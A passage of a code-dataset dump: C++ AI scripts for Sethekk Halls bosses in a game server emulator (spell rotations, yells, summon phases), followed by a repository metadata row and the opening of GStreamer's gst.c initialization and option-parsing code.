        spells[1].targettype = TARGET_ATTACKING;
        spells[1].instant = true;
        spells[1].perctrigger = 9.0f;
        spells[1].attackstoptimer = 1000;
        spells[2].info = sSpellStore.LookupEntry(SHADOW_SHOCK);
        spells[2].targettype = TARGET_ATTACKING;
        spells[2].instant = true;
        spells[2].perctrigger = 9.0f;
        spells[2].attackstoptimer = 1000;
        spells[3].info = sSpellStore.LookupEntry(ARCANE_SHOCK);
        spells[3].targettype = TARGET_ATTACKING;
        spells[3].instant = true;
        spells[3].perctrigger = 9.0f;
        spells[3].attackstoptimer = 1000;
        spells[4].info = sSpellStore.LookupEntry(CHAIN_LIGHTNING);
        spells[4].targettype = TARGET_ATTACKING;
        spells[4].instant = true;
        spells[4].perctrigger = 15.0f;
        spells[4].attackstoptimer = 1000;
        // Spells 5-8: elemental summons.  perctrigger is 0 so SpellCast()
        // never rolls them; they are cast by SummonElementalWave() only.
        spells[5].info = sSpellStore.LookupEntry(SUMMON_SYTH_FIRE_ELEMENTAL);
        spells[5].targettype = TARGET_SELF;
        spells[5].instant = true;
        spells[5].perctrigger = 0.0f;
        spells[5].attackstoptimer = 1000;
        spells[6].info = sSpellStore.LookupEntry(SUMMON_SYTH_FROST_ELEMENTAL);
        spells[6].targettype = TARGET_SELF;
        spells[6].instant = true;
        spells[6].perctrigger = 0.0f;
        spells[6].attackstoptimer = 1000;
        spells[7].info = sSpellStore.LookupEntry(SUMMON_SYTH_ARCANE_ELEMENTAL);
        spells[7].targettype = TARGET_SELF;
        spells[7].instant = true;
        spells[7].perctrigger = 0.0f;
        spells[7].attackstoptimer = 1000;
        spells[8].info = sSpellStore.LookupEntry(SUMMON_SYTH_SHADOW_ELEMENTAL);
        spells[8].targettype = TARGET_SELF;
        spells[8].instant = true;
        spells[8].perctrigger = 0.0f;
        spells[8].attackstoptimer = 1000;
    }

    void OnCombatStart(Unit* mTarget)
    {
        SUMMON_LIMITER = 1;
        // Pick one of three aggro yells.
        int RandomSpeach;
        RandomSpeach = rand() % 3;
        switch (RandomSpeach)
        {
        case 0:
            _unit->SendChatMessage(CHAT_MSG_MONSTER_YELL, LANG_UNIVERSAL, "Time to... make my move!"); // needs corrections
            _unit->PlaySoundToSet(10503);
            break;
        case 1:
            _unit->SendChatMessage(CHAT_MSG_MONSTER_YELL, LANG_UNIVERSAL, "Nice pets, yes!"); // corrections needed!
            _unit->PlaySoundToSet(10504);
            break;
        case 2:
            _unit->SendChatMessage(CHAT_MSG_MONSTER_YELL, LANG_UNIVERSAL, "Nice pets have... weapons, not so... nice!");
            _unit->PlaySoundToSet(10505);
            break;
        }
        RegisterAIUpdateEvent(_unit->GetUInt32Value(UNIT_FIELD_BASEATTACKTIME));
    }

    void OnTargetDied(Unit* mTarget)
    {
        if (_unit->GetHealthPct() > 0) // Hack to prevent double yelling (OnDied and OnTargetDied when creature is dying)
        {
            // Pick one of two kill yells.
            int RandomSpeach;
            RandomSpeach = rand() % 2;
            switch (RandomSpeach)
            {
            case 0:
                _unit->SendChatMessage(CHAT_MSG_MONSTER_YELL, LANG_UNIVERSAL, "Yes! Fleeting life is..."); // need to add it
                _unit->PlaySoundToSet(10506);
                break;
            case 1:
                _unit->SendChatMessage(CHAT_MSG_MONSTER_YELL, LANG_UNIVERSAL, "Be free!"); // corrections needed!!
                _unit->PlaySoundToSet(10507);
                break;
            }
        }
    }

    void OnCombatStop(Unit *mTarget)
    {
        SUMMON_LIMITER = 1;
        _unit->GetAIInterface()->setCurrentAgent(AGENT_NULL);
        _unit->GetAIInterface()->SetAIState(STATE_IDLE);
        RemoveAIUpdateEvent();
    }

    void OnDied(Unit * mKiller)
    {
        SUMMON_LIMITER = 1;
        _unit->SendChatMessage(CHAT_MSG_MONSTER_YELL, LANG_UNIVERSAL, "No more life, no more pain!"); // It's talking so <censored>
        _unit->PlaySoundToSet(10508);
        RemoveAIUpdateEvent();
    }

    void AIUpdate()
    {
        // At each 25% health threshold summon one elemental wave,
        // otherwise run the normal spell rotation.
        if ((_unit->GetHealthPct() <= 75 && SUMMON_LIMITER == 1) || (_unit->GetHealthPct() <= 50 && SUMMON_LIMITER == 2) || (_unit->GetHealthPct() <= 25 && SUMMON_LIMITER == 3))
        {
            SummonElementalWave();
        }
        else
        {
            float val = sRand.rand(100.0f);
            SpellCast(val);
        }
    }

    // Casts all four elemental summon spells at once and advances the
    // wave counter so this threshold does not retrigger.
    void SummonElementalWave()
    {
        _unit->CastSpell(_unit, spells[5].info, spells[5].instant);
        _unit->CastSpell(_unit, spells[6].info, spells[6].instant);
        _unit->CastSpell(_unit, spells[7].info, spells[7].instant);
        _unit->CastSpell(_unit, spells[8].info, spells[8].instant);
        _unit->SendChatMessage(CHAT_MSG_MONSTER_YELL, LANG_UNIVERSAL, "I have pets... of my own"); // It's talking so <doublecensored> -.-'
        _unit->PlaySoundToSet(10502);
        SUMMON_LIMITER += 1;
    }

    void SpellCast(float val)
    {
        // Only act when not already casting and a target exists.
        if(_unit->GetCurrentSpell() == NULL && _unit->GetAIInterface()->GetNextTarget())
        {
            // Lower bound of each spell's probability band.
            float comulativeperc = 0;
            Unit *target = NULL;
            for(int i = 0; i < nrspells; i++)
            {
                if(!spells[i].perctrigger) continue;
                if(m_spellcheck[i])
                {
                    // Spell was armed on an earlier tick -- cast it now.
                    target = _unit->GetAIInterface()->GetNextTarget();
                    switch(spells[i].targettype)
                    {
                    case TARGET_SELF:
                    case TARGET_VARIOUS:
                        _unit->CastSpell(_unit, spells[i].info, spells[i].instant); break;
                    case TARGET_ATTACKING:
                        _unit->CastSpell(target, spells[i].info, spells[i].instant); break;
                    case TARGET_DESTINATION:
                        _unit->CastSpellAoF(target->GetPositionX(), target->GetPositionY(), target->GetPositionZ(), spells[i].info, spells[i].instant); break;
                    }
                    // Optional per-spell yell (speech is empty for all
                    // spells configured above, so this never fires here).
                    if (spells[i].speech != "")
                    {
                        _unit->SendChatMessage(CHAT_MSG_MONSTER_YELL, LANG_UNIVERSAL, spells[i].speech.c_str());
                        _unit->PlaySoundToSet(spells[i].soundid);
                    }
                    m_spellcheck[i] = false;
                    return;
                }
                // Arm when the roll lands in (comulativeperc, comulativeperc + perctrigger].
                if(val > comulativeperc && val <= (comulativeperc + spells[i].perctrigger))
                {
                    _unit->setAttackTimer(spells[i].attackstoptimer, false);
                    m_spellcheck[i] = true;
                }
                comulativeperc += spells[i].perctrigger;
            }
        }
    }

protected:
    // Next elemental wave to summon: 1 (at 75%), 2 (50%), 3 (25%), 4 = done.
    uint32 SUMMON_LIMITER;
    int nrspells;
};
// Talon King IkissAI
#define CN_TALON_KING_IKISS 18473
#define ARCANE_VOLLEY 37078 // maybe should be: 37078 or other
#define ARCANE_EXPLOSION 38197 // bit too high dmg, but should work nearly in the same way
#define BLINK 38642 // Should be to random character, also can be: 38642, 29883, 38932, 36718, // doesn't work, because of lack features in core
#define POLYMORPH 38245 // worth to try also: 38245, 38896
#define MANA_SHIELD 38151 // also: 35064, 38151
class TALONKINGIKISSAI : public CreatureAIScript
{
public:
ADD_CREATURE_FACTORY_FUNCTION(TALONKINGIKISSAI);
SP_AI_Spell spells[5];
bool m_spellcheck[5];
TALONKINGIKISSAI(Creature* pCreature) : CreatureAIScript(pCreature)
{
nrspells = 5;
for(int i=0;i<nrspells;i++)
{
m_spellcheck[i] = false;
}
spells[0].info = sSpellStore.LookupEntry(ARCANE_VOLLEY);
spells[0].targettype = TARGET_VARIOUS;
spells[0].instant = false;
spells[0].perctrigger = 15.0f;
spells[0].attackstoptimer = 1000;
spells[1].info = sSpellStore.LookupEntry(ARCANE_EXPLOSION);
spells[1].targettype = TARGET_VARIOUS;
spells[1].instant = false;
spells[1].perctrigger = 8.0f;
spells[1].attackstoptimer = 1000;
spells[2].info = sSpellStore.LookupEntry(BLINK);
spells[2].targettype = TARGET_ATTACKING; // SELF?
spells[2].instant = true;
spells[2].perctrigger = 5.0f;
spells[2].attackstoptimer = 1000;
spells[3].info = sSpellStore.LookupEntry(POLYMORPH);
spells[3].targettype = TARGET_ATTACKING;
spells[3].instant = false;
spells[3].perctrigger = 7.0f;
spells[3].attackstoptimer = 1000;
spells[4].info = sSpellStore.LookupEntry(MANA_SHIELD);
spells[4].targettype = TARGET_SELF;
spells[4].instant = true;
spells[4].perctrigger = 6.0f;
spells[4].attackstoptimer = 1000;
}
void OnCombatStart(Unit* mTarget)
{
int RandomSpeach;
sRand.randInt(1000);
RandomSpeach=rand()%3;
switch (RandomSpeach)
{
case 0:
_unit->SendChatMessage(CHAT_MSG_MONSTER_YELL, LANG_UNIVERSAL, "You make war on Ikiss!"); // needs corrections
_unit->PlaySoundToSet(10554);
break;
case 1:
_unit->SendChatMessage(CHAT_MSG_MONSTER_YELL, LANG_UNIVERSAL, "Ikiss caught you pretty... sliced you, yes!"); // corrections needed!
_unit->PlaySoundToSet(10555);
break;
case 2:
_unit->SendChatMessage(CHAT_MSG_MONSTER_YELL, LANG_UNIVERSAL, "No escape for... for you!");
_unit->PlaySoundToSet(10556);
break;
}
RegisterAIUpdateEvent(_unit->GetUInt32Value(UNIT_FIELD_BASEATTACKTIME));
}
void OnTargetDied(Unit* mTarget) // left to keep it easy to add needed data.
{
if (_unit->GetHealthPct() > 0) // Hack to prevent double yelling (OnDied and OnTargetDied when creature is dying)
{
int RandomSpeach;
sRand.randInt(1000);
RandomSpeach=rand()%2;
switch (RandomSpeach)
{
case 0:
_unit->SendChatMessage(CHAT_MSG_MONSTER_YELL, LANG_UNIVERSAL, "You'll die! Stay away from trinkets!"); // needs corrections
_unit->PlaySoundToSet(10558);
break;
case 1:
_unit->SendChatMessage(CHAT_MSG_MONSTER_YELL, LANG_UNIVERSAL, "<strange_noises>"); // corrections needed!
_unit->PlaySoundToSet(10559);
break;
}
}
}
void OnCombatStop(Unit *mTarget)
{
_unit->GetAIInterface()->setCurrentAgent(AGENT_NULL);
_unit->GetAIInterface()->SetAIState(STATE_IDLE);
RemoveAIUpdateEvent();
}
void OnDied(Unit * mKiller)
{
_unit->SendChatMessage(CHAT_MSG_MONSTER_YELL, LANG_UNIVERSAL, "Ikiss will not... die!");
_unit->PlaySoundToSet(10560);
RemoveAIUpdateEvent();
}
void AIUpdate()
{
float val = sRand.rand(100.0f);
SpellCast(val);
}
void SpellCast(float val)
{
if(_unit->GetCurrentSpell() == NULL && _unit->GetAIInterface()->GetNextTarget())
{
float comulativeperc = 0;
Unit *target = NULL;
for(int i=0;i<nrspells;i++)
{
if(!spells[i].perctrigger) continue;
if(m_spellcheck[i])
{
target = _unit->GetAIInterface()->GetNextTarget();
switch(spells[i].targettype)
{
case TARGET_SELF:
case TARGET_VARIOUS:
_unit->CastSpell(_unit, spells[i].info, spells[i].instant); break;
case TARGET_ATTACKING:
_unit->CastSpell(target, spells[i].info, spells[i].instant); break;
case TARGET_DESTINATION:
_unit->CastSpellAoF(target->GetPositionX(),target->GetPositionY(),target->GetPositionZ(), spells[i].info, spells[i].instant); break;
}
if (spells[i].speech != "")
{
_unit->SendChatMessage(CHAT_MSG_MONSTER_YELL, LANG_UNIVERSAL, spells[i].speech.c_str());
_unit->PlaySoundToSet(spells[i].soundid);
}
m_spellcheck[i] = false;
return;
}
if(val > comulativeperc && val <= (comulativeperc + spells[i].perctrigger))
{
_unit->setAttackTimer(spells[i].attackstoptimer, false);
m_spellcheck[i] = true;
}
comulativeperc += spells[i].perctrigger;
}
}
}
protected:
int nrspells;
};
// AnzuAI
#define CN_ANZU 23035 // that should be real id, but it is not existing in my DB
#define SUMMON_RAVEN_GOD 40098 // event just to test it!
#define SPELL_BOMB 40303
#define CYCLONE_OF_FEATHERS 40321
#define PARALYZING_SCREECH 40184
#define CHARGE_ANZU 40602 // no idea, can be: 40602, 39574 and others
#define BANISH 40370 // can be: 38791, 38009, 40370, 39674, 35182, 40825 // should banish for one minute
//#define SPAWN_BIRDS Can't find for now =/
// Anzu, the Raven God (creature entry 23035).
// Rotation of Spell Bomb / Cyclone of Feathers / Paralyzing Screech /
// Charge; at 66% and 33% health it banishes itself (summon phase).
//
// Fixes:
//  * OnCombatStart() and SummonPhase() passed 'spells[n].targettype' as the
//    third CastSpell() argument, which is the 'instant' bool -- every other
//    cast in this file passes 'spells[n].instant'.  Corrected.
//  * Removed the unused, never-initialized 'Unit *target' data member
//    (always shadowed by the local in SpellCast(), never read).
class ANZUAI : public CreatureAIScript
{
public:
    ADD_CREATURE_FACTORY_FUNCTION(ANZUAI);
    SP_AI_Spell spells[6];
    // Armed-flags: set when a roll selects a spell, cleared when it is cast.
    bool m_spellcheck[6];

    ANZUAI(Creature* pCreature) : CreatureAIScript(pCreature)
    {
        SUMMON_LIMITER = 1;
        nrspells = 6;
        for(int i = 0; i < nrspells; i++)
        {
            m_spellcheck[i] = false;
        }
        // Spells 0-3: combat rotation, selected randomly in SpellCast().
        spells[0].info = sSpellStore.LookupEntry(SPELL_BOMB);
        spells[0].targettype = TARGET_ATTACKING;
        spells[0].instant = true;
        spells[0].perctrigger = 10.0f;
        spells[0].attackstoptimer = 1000;
        spells[1].info = sSpellStore.LookupEntry(CYCLONE_OF_FEATHERS);
        spells[1].targettype = TARGET_ATTACKING;
        spells[1].instant = false;
        spells[1].perctrigger = 10.0f;
        spells[1].attackstoptimer = 1000;
        spells[2].info = sSpellStore.LookupEntry(PARALYZING_SCREECH);
        spells[2].targettype = TARGET_VARIOUS;
        spells[2].instant = false;
        spells[2].perctrigger = 10.0f;
        spells[2].attackstoptimer = 1000;
        spells[3].info = sSpellStore.LookupEntry(CHARGE_ANZU);
        spells[3].targettype = TARGET_ATTACKING;
        spells[3].instant = true;
        spells[3].perctrigger = 5.0f;
        spells[3].attackstoptimer = 1000;
        // Spells 4-5: scripted casts only (perctrigger 0, never rolled).
        // Spell 4: Banish (self) used by SummonPhase().
        spells[4].info = sSpellStore.LookupEntry(BANISH);
        spells[4].targettype = TARGET_SELF;
        spells[4].instant = true;
        spells[4].perctrigger = 0.0f;
        spells[4].attackstoptimer = 1000;
        // Spell 5: Summon Raven God, cast once on combat start.
        spells[5].info = sSpellStore.LookupEntry(SUMMON_RAVEN_GOD);
        spells[5].targettype = TARGET_SELF;
        spells[5].instant = true;
        spells[5].perctrigger = 0.0f;
        spells[5].attackstoptimer = 1000;
        /*
        spells[6].info = sSpellStore.LookupEntry(SUMMON_BIRDS);
        spells[6].targettype = TARGET_SELF;
        spells[6].instant = true;
        spells[6].perctrigger = 0.0f;
        spells[6].attackstoptimer = 1000;
        */
    }

    void OnCombatStart(Unit* mTarget)
    {
        // Was: spells[5].targettype (the enum) passed as the 'instant' bool.
        _unit->CastSpell(_unit, spells[5].info, spells[5].instant);
        SUMMON_LIMITER = 1;
        RegisterAIUpdateEvent(_unit->GetUInt32Value(UNIT_FIELD_BASEATTACKTIME));
    }

    void OnTargetDied(Unit* mTarget) // left to keep it easy to add needed data.
    {
    }

    void OnCombatStop(Unit *mTarget)
    {
        SUMMON_LIMITER = 1;
        _unit->GetAIInterface()->setCurrentAgent(AGENT_NULL);
        _unit->GetAIInterface()->SetAIState(STATE_IDLE);
        RemoveAIUpdateEvent();
    }

    void OnDied(Unit * mKiller)
    {
        SUMMON_LIMITER = 1;
        RemoveAIUpdateEvent();
    }

    void AIUpdate()
    {
        // At 66% and 33% health enter the banish/summon phase,
        // otherwise run the normal rotation.
        if((_unit->GetHealthPct() <= 66 && SUMMON_LIMITER == 1) || (_unit->GetHealthPct() <= 33 && SUMMON_LIMITER == 2) )
        {
            SummonPhase();
        }
        else
        {
            float val = sRand.rand(100.0f);
            SpellCast(val);
        }
    }

    void SummonPhase()
    {
        SUMMON_LIMITER += 1;
        // Was: spells[4].targettype (the enum) passed as the 'instant' bool.
        _unit->CastSpell(_unit, spells[4].info, spells[4].instant);
        //_unit->CastSpell(_unit, spells[6].info, spells[6].instant); Bird summon spell
    }

    void SpellCast(float val)
    {
        // Only act when not already casting and a target exists.
        if(_unit->GetCurrentSpell() == NULL && _unit->GetAIInterface()->GetNextTarget())
        {
            // Lower bound of each spell's probability band.
            float comulativeperc = 0;
            Unit *target = NULL;
            for(int i = 0; i < nrspells; i++)
            {
                if(!spells[i].perctrigger) continue;
                if(m_spellcheck[i])
                {
                    // Spell was armed on an earlier tick -- cast it now.
                    target = _unit->GetAIInterface()->GetNextTarget();
                    switch(spells[i].targettype)
                    {
                    case TARGET_SELF:
                    case TARGET_VARIOUS:
                        _unit->CastSpell(_unit, spells[i].info, spells[i].instant); break;
                    case TARGET_ATTACKING:
                        _unit->CastSpell(target, spells[i].info, spells[i].instant); break;
                    case TARGET_DESTINATION:
                        _unit->CastSpellAoF(target->GetPositionX(), target->GetPositionY(), target->GetPositionZ(), spells[i].info, spells[i].instant); break;
                    }
                    // Optional per-spell yell (speech is empty for all
                    // spells configured above, so this never fires here).
                    if (spells[i].speech != "")
                    {
                        _unit->SendChatMessage(CHAT_MSG_MONSTER_YELL, LANG_UNIVERSAL, spells[i].speech.c_str());
                        _unit->PlaySoundToSet(spells[i].soundid);
                    }
                    m_spellcheck[i] = false;
                    return;
                }
                // Arm when the roll lands in (comulativeperc, comulativeperc + perctrigger].
                if(val > comulativeperc && val <= (comulativeperc + spells[i].perctrigger))
                {
                    _unit->setAttackTimer(spells[i].attackstoptimer, false);
                    m_spellcheck[i] = true;
                }
                comulativeperc += spells[i].perctrigger;
            }
        }
    }

protected:
    // Next summon phase to trigger: 1 (at 66%), 2 (33%), 3 = done.
    uint32 SUMMON_LIMITER;
    int nrspells;
};
// Registers every Sethekk Halls creature AI defined in this file with the
// script manager, keyed by creature entry id.  Called once at plugin load.
void SetupSethekkHalls(ScriptMgr * mgr)
{
// Trash mobs.
mgr->register_creature_script(CN_AVIAN_DARKHAWK, &AVIANDARKHAWKAI::Create);
mgr->register_creature_script(CN_AVIAN_RIPPER, &AVIANRIPPERAI::Create);
mgr->register_creature_script(CN_AVIAN_WARHAWK, &AVIANWARHAWKAI::Create);
mgr->register_creature_script(CN_COBALT_SERPENT, &COBALTSERPENTAI::Create);
mgr->register_creature_script(CN_TIME_LOST_CONTROLLER, &TIMELOSTCONTROLLERAI::Create);
mgr->register_creature_script(CN_TIME_LOST_SCRYER, &TIMELOSTSCRYERAI::Create);
mgr->register_creature_script(CN_TIME_LOST_SHADOWMAGE, &TIMELOSTSHADOWMAGEAI::Create);
mgr->register_creature_script(CN_SETHEKK_GUARD, &SETHEKKGUARDAI::Create);
mgr->register_creature_script(CN_SETHEKK_INITIATE, &SETHEKKINITIATEAI::Create);
mgr->register_creature_script(CN_SETHEKK_ORACLE, &SETHEKKORACLEAI::Create);
mgr->register_creature_script(CN_SETHEKK_PROPHET, &SETHEKKPROPHETAI::Create);
mgr->register_creature_script(CN_SETHEKK_RAVENGUARD, &SETHEKKRAVENGUARDAI::Create);
mgr->register_creature_script(CN_SETHEKK_SHAMAN, &SETHEKKSHAMANAI::Create);
mgr->register_creature_script(CN_SETHEKK_TALON_LORD, &SETHEKKTALONLORDAI::Create);
// Bosses.
mgr->register_creature_script(CN_DARKWEAVER_SYTH, &DARKWEAVERSYTHAI::Create);
mgr->register_creature_script(CN_TALON_KING_IKISS, &TALONKINGIKISSAI::Create);
mgr->register_creature_script(CN_ANZU, &ANZUAI::Create);
}
// Can't check Anzu, as I don't have it in DB right now. Add some spells (2?) and
// change other if needed.
| gpl-2.0 |
teamfx/openjfx-10-dev-rt | modules/javafx.media/src/main/native/gstreamer/gstreamer-lite/gstreamer/gst/gst.c | 2 | 41555 | /* GStreamer
* Copyright (C) 1999,2000 Erik Walthinsen <omega@cse.ogi.edu>
* 2000 Wim Taymans <wtay@chello.be>
*
* gst.c: Initialization and non-pipeline operations
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Library General Public
* License as published by the Free Software Foundation; either
* version 2 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Library General Public License for more details.
*
* You should have received a copy of the GNU Library General Public
* License along with this library; if not, write to the
* Free Software Foundation, Inc., 51 Franklin St, Fifth Floor,
* Boston, MA 02110-1301, USA.
*/
/**
* SECTION:gst
* @short_description: Media library supporting arbitrary formats and filter
* graphs.
*
* GStreamer is a framework for constructing graphs of various filters
* (termed elements here) that will handle streaming media. Any discreet
* (packetizable) media type is supported, with provisions for automatically
* determining source type. Formatting/framing information is provided with
* a powerful negotiation framework. Plugins are heavily used to provide for
* all elements, allowing one to construct plugins outside of the GST
* library, even released binary-only if license require (please don't).
* GStreamer covers a wide range of use cases including: playback, recording,
* editing, serving streams, voice over ip and video calls.
*
* The <application>GStreamer</application> library should be initialized with
* gst_init() before it can be used. You should pass pointers to the main argc
* and argv variables so that GStreamer can process its own command line
* options, as shown in the following example.
*
* <example>
* <title>Initializing the gstreamer library</title>
* <programlisting language="c">
* int
* main (int argc, char *argv[])
* {
* // initialize the GStreamer library
* gst_init (&argc, &argv);
* ...
* }
* </programlisting>
* </example>
*
* It's allowed to pass two %NULL pointers to gst_init() in case you don't want
* to pass the command line args to GStreamer.
*
* You can also use GOption to initialize your own parameters as shown in
* the next code fragment:
* <example>
* <title>Initializing own parameters when initializing gstreamer</title>
* <programlisting>
* static gboolean stats = FALSE;
* ...
* int
* main (int argc, char *argv[])
* {
* GOptionEntry options[] = {
* {"tags", 't', 0, G_OPTION_ARG_NONE, &tags,
* N_("Output tags (also known as metadata)"), NULL},
* {NULL}
* };
* ctx = g_option_context_new ("[ADDITIONAL ARGUMENTS]");
* g_option_context_add_main_entries (ctx, options, GETTEXT_PACKAGE);
* g_option_context_add_group (ctx, gst_init_get_option_group ());
* if (!g_option_context_parse (ctx, &argc, &argv, &err)) {
* g_print ("Error initializing: %s\n", GST_STR_NULL (err->message));
* exit (1);
* }
* g_option_context_free (ctx);
* ...
* }
* </programlisting>
* </example>
*
* Use gst_version() to query the library version at runtime or use the
* GST_VERSION_* macros to find the version at compile time. Optionally
* gst_version_string() returns a printable string.
*
* The gst_deinit() call is used to clean up all internal resources used
* by <application>GStreamer</application>. It is mostly used in unit tests
* to check for leaks.
*/
#include "gst_private.h"
#include "gstconfig.h"
#include <stdlib.h>
#include <stdio.h>
#include <sys/types.h>
#ifdef HAVE_SYS_UTSNAME_H
#include <sys/utsname.h>
#endif
#ifdef HAVE_UNISTD_H
#include <unistd.h>
#endif
#ifdef G_OS_WIN32
#define WIN32_LEAN_AND_MEAN /* prevents from including too many things */
#include <windows.h> /* GetStdHandle, windows console */
#endif
#if defined(GSTREAMER_LITE)
#include "gstplugins-lite.h"
#endif // GSTREAMER_LITE
#include "gst-i18n-lib.h"
#include <locale.h> /* for LC_ALL */
#include "gst.h"
#include "gsttrace.h"
#define GST_CAT_DEFAULT GST_CAT_GST_INIT
#define MAX_PATH_SPLIT 16
#define GST_PLUGIN_SEPARATOR ","
static gboolean gst_initialized = FALSE;
static gboolean gst_deinitialized = FALSE;
#ifdef G_OS_WIN32
HMODULE _priv_gst_dll_handle = NULL;
#endif
#ifndef GST_DISABLE_REGISTRY
GList *_priv_gst_plugin_paths = NULL; /* for delayed processing in post_init */
extern gboolean _priv_gst_disable_registry_update;
#endif
#ifndef GST_DISABLE_GST_DEBUG
const gchar *priv_gst_dump_dot_dir;
#endif
/* defaults */
/* set to TRUE when segfaults need to be left as is */
static gboolean _gst_disable_segtrap = FALSE;
static gboolean init_pre (GOptionContext * context, GOptionGroup * group,
gpointer data, GError ** error);
static gboolean init_post (GOptionContext * context, GOptionGroup * group,
gpointer data, GError ** error);
#ifndef GST_DISABLE_OPTION_PARSING
static gboolean parse_goption_arg (const gchar * s_opt,
const gchar * arg, gpointer data, GError ** err);
#endif
GSList *_priv_gst_preload_plugins = NULL;
const gchar g_log_domain_gstreamer[] = "GStreamer";
/* GLib log handler installed for GStreamer's log domain: forwards every
 * message to the default GLib handler unchanged.  The interactive
 * g_on_error_query() hook is kept commented out below. */
static void
debug_log_handler (const gchar * log_domain,
GLogLevelFlags log_level, const gchar * message, gpointer user_data)
{
g_log_default_handler (log_domain, log_level, message, user_data);
/* FIXME: do we still need this ? fatal errors these days are all
 * other than core errors */
/* g_on_error_query (NULL); */
}
/* Identifiers for GStreamer's command-line options, passed as the
 * callback data in the GOptionEntry tables below.  Starts at 1 so that
 * 0 never collides with a valid option id.  The debug-related ids are
 * compiled out together with the debugging subsystem. */
enum
{
ARG_VERSION = 1,
ARG_FATAL_WARNINGS,
#ifndef GST_DISABLE_GST_DEBUG
ARG_DEBUG_LEVEL,
ARG_DEBUG,
ARG_DEBUG_DISABLE,
ARG_DEBUG_NO_COLOR,
ARG_DEBUG_COLOR_MODE,
ARG_DEBUG_HELP,
#endif
ARG_PLUGIN_SPEW,
ARG_PLUGIN_PATH,
ARG_PLUGIN_LOAD,
ARG_SEGTRAP_DISABLE,
ARG_REGISTRY_UPDATE_DISABLE,
ARG_REGISTRY_FORK_DISABLE
};
/* debug-spec ::= category-spec [, category-spec]*
* category-spec ::= category:val | val
* category ::= [^:]+
* val ::= [0-5]
*/
#ifndef GSTREAMER_LITE
#ifdef G_OS_WIN32
/* Windows-only DLL entry point: records the module handle of the
 * GStreamer DLL so init_pre() can derive the installation directory. */
BOOL WINAPI DllMain (HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved);
BOOL WINAPI
DllMain (HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
  if (fdwReason == DLL_PROCESS_ATTACH)
    _priv_gst_dll_handle = (HMODULE) hinstDLL;
  return TRUE;
}

#endif
#endif // GSTREAMER_LITE
/**
* gst_init_get_option_group: (skip)
*
* Returns a #GOptionGroup with GStreamer's argument specifications. The
* group is set up to use standard GOption callbacks, so when using this
* group in combination with GOption parsing methods, all argument parsing
* and initialization is automated.
*
* This function is useful if you want to integrate GStreamer with other
* libraries that use GOption (see g_option_context_add_group() ).
*
* If you use this function, you should make sure you initialise the GLib
* threading system as one of the very first things in your program
* (see the example at the beginning of this section).
*
* Returns: (transfer full): a pointer to GStreamer's option group.
*/
GOptionGroup *
gst_init_get_option_group (void)
{
#ifndef GST_DISABLE_OPTION_PARSING
  GOptionGroup *group;
  /* Every entry uses parse_goption_arg() as its callback; that function
   * maps the long option name back onto the corresponding ARG_* code. */
  static const GOptionEntry gst_args[] = {
    {"gst-version", 0, G_OPTION_FLAG_NO_ARG, G_OPTION_ARG_CALLBACK,
        (gpointer) parse_goption_arg, N_("Print the GStreamer version"), NULL},
    {"gst-fatal-warnings", 0, G_OPTION_FLAG_NO_ARG, G_OPTION_ARG_CALLBACK,
        (gpointer) parse_goption_arg, N_("Make all warnings fatal"), NULL},
#ifndef GST_DISABLE_GST_DEBUG
    {"gst-debug-help", 0, G_OPTION_FLAG_NO_ARG, G_OPTION_ARG_CALLBACK,
          (gpointer) parse_goption_arg,
          N_("Print available debug categories and exit"),
        NULL},
    {"gst-debug-level", 0, 0, G_OPTION_ARG_CALLBACK,
          (gpointer) parse_goption_arg,
          N_("Default debug level from 1 (only error) to 9 (anything) or "
              "0 for no output"),
        N_("LEVEL")},
    {"gst-debug", 0, 0, G_OPTION_ARG_CALLBACK, (gpointer) parse_goption_arg,
          N_("Comma-separated list of category_name:level pairs to set "
              "specific levels for the individual categories. Example: "
              "GST_AUTOPLUG:5,GST_ELEMENT_*:3"),
        N_("LIST")},
    {"gst-debug-no-color", 0, G_OPTION_FLAG_NO_ARG, G_OPTION_ARG_CALLBACK,
          (gpointer) parse_goption_arg, N_("Disable colored debugging output"),
        NULL},
    {"gst-debug-color-mode", 0, 0, G_OPTION_ARG_CALLBACK,
          (gpointer) parse_goption_arg,
          N_("Changes coloring mode of the debug log. "
              "Possible modes: off, on, disable, auto, unix"),
        NULL},
    {"gst-debug-disable", 0, G_OPTION_FLAG_NO_ARG, G_OPTION_ARG_CALLBACK,
        (gpointer) parse_goption_arg, N_("Disable debugging"), NULL},
#endif
    {"gst-plugin-spew", 0, G_OPTION_FLAG_NO_ARG, G_OPTION_ARG_CALLBACK,
          (gpointer) parse_goption_arg,
          N_("Enable verbose plugin loading diagnostics"),
        NULL},
    {"gst-plugin-path", 0, 0, G_OPTION_ARG_CALLBACK,
          (gpointer) parse_goption_arg,
        N_("Colon-separated paths containing plugins"), N_("PATHS")},
    {"gst-plugin-load", 0, 0, G_OPTION_ARG_CALLBACK,
          (gpointer) parse_goption_arg,
          N_("Comma-separated list of plugins to preload in addition to the "
              "list stored in environment variable GST_PLUGIN_PATH"),
        N_("PLUGINS")},
    {"gst-disable-segtrap", 0, G_OPTION_FLAG_NO_ARG, G_OPTION_ARG_CALLBACK,
          (gpointer) parse_goption_arg,
          N_("Disable trapping of segmentation faults during plugin loading"),
        NULL},
    {"gst-disable-registry-update", 0, G_OPTION_FLAG_NO_ARG,
          G_OPTION_ARG_CALLBACK,
          (gpointer) parse_goption_arg,
          N_("Disable updating the registry"),
        NULL},
    {"gst-disable-registry-fork", 0, G_OPTION_FLAG_NO_ARG,
          G_OPTION_ARG_CALLBACK,
          (gpointer) parse_goption_arg,
          N_("Disable spawning a helper process while scanning the registry"),
        NULL},
    {NULL}
  };

  group = g_option_group_new ("gst", _("GStreamer Options"),
      _("Show GStreamer Options"), NULL, NULL);
  /* init_pre()/init_post() are run as pre/post parse hooks, so a plain
   * g_option_context_parse() with this group fully initializes GStreamer */
  g_option_group_set_parse_hooks (group, (GOptionParseFunc) init_pre,
      (GOptionParseFunc) init_post);
  g_option_group_add_entries (group, gst_args);
  g_option_group_set_translation_domain (group, GETTEXT_PACKAGE);

  return group;
#else
  return NULL;
#endif
}
/**
* gst_init_check:
* @argc: (inout) (allow-none): pointer to application's argc
